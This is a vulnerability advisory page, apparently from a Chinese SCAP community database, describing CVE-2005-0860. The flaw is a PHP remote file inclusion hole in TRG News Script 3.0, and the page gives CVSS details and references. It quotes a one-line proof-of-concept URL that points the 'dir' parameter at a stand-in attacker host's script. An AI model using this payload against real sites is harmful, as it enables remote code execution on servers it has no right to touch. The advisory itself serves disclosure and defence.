CVE-2005-0860
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:47:31
NMCOS    

[原文]PHP remote file inclusion vulnerability in TRG News Script 3.0 allows remote attackers to execute arbitrary PHP code via the dir parameter to (1) article.php, (2) authorall.php, (3) comment.php, (4) display.php, or (5) displayall.php.


[CNNVD]TRG News Script远程文件包含漏洞(CNNVD-200505-084)

        TRG News Script 3.0中存在PHP远程文件包含漏洞,允许远程攻击者通过(1)article.php,(2)authorall.php,(3)comment.php,(4)display.php或(5)displayall.php的dir参数来执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0860
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0860
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-084
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/12855
(UNKNOWN)  BID  12855
http://securitytracker.com/id?1013487
(UNKNOWN)  SECTRACK  1013487
http://secunia.com/advisories/14669
(VENDOR_ADVISORY)  SECUNIA  14669

- 漏洞信息

TRG News Script远程文件包含漏洞
高危 输入验证
2005-05-02 00:00:00 2006-09-28 00:00:00
远程  
        TRG News Script 3.0中存在PHP远程文件包含漏洞,允许远程攻击者通过(1)article.php,(2)authorall.php,(3)comment.php,(4)display.php或(5)displayall.php的dir参数来执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息

14920
TRG News article.php Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

TRG News contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'article.php' not properly sanitizing user input supplied to the 'dir' variable. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2005-03-19 Unknow
2005-03-19 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

TRG News Script Remote File Include Vulnerability
Input Validation Error 12855
Yes No
2005-03-21 12:00:00 2009-07-12 10:56:00
Frank_Reiner <mail@frank-reissner.de> is credited with the discovery of this issue.

- 受影响的程序版本

The Rusted Gate TRG News 3.0

- 漏洞讨论

A remote file include vulnerability affects TRG News. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.

Remote attackers could potentially exploit this issue to include a remote, malicious PHP script. Execution of remote scripts would take place in the context of the Web server hosting the vulnerable application. This will facilitate unauthorized access.

- 漏洞利用

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/trg_news30/trgnews/install/article.php?dir=http://www.example.org/attackerScript.php

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站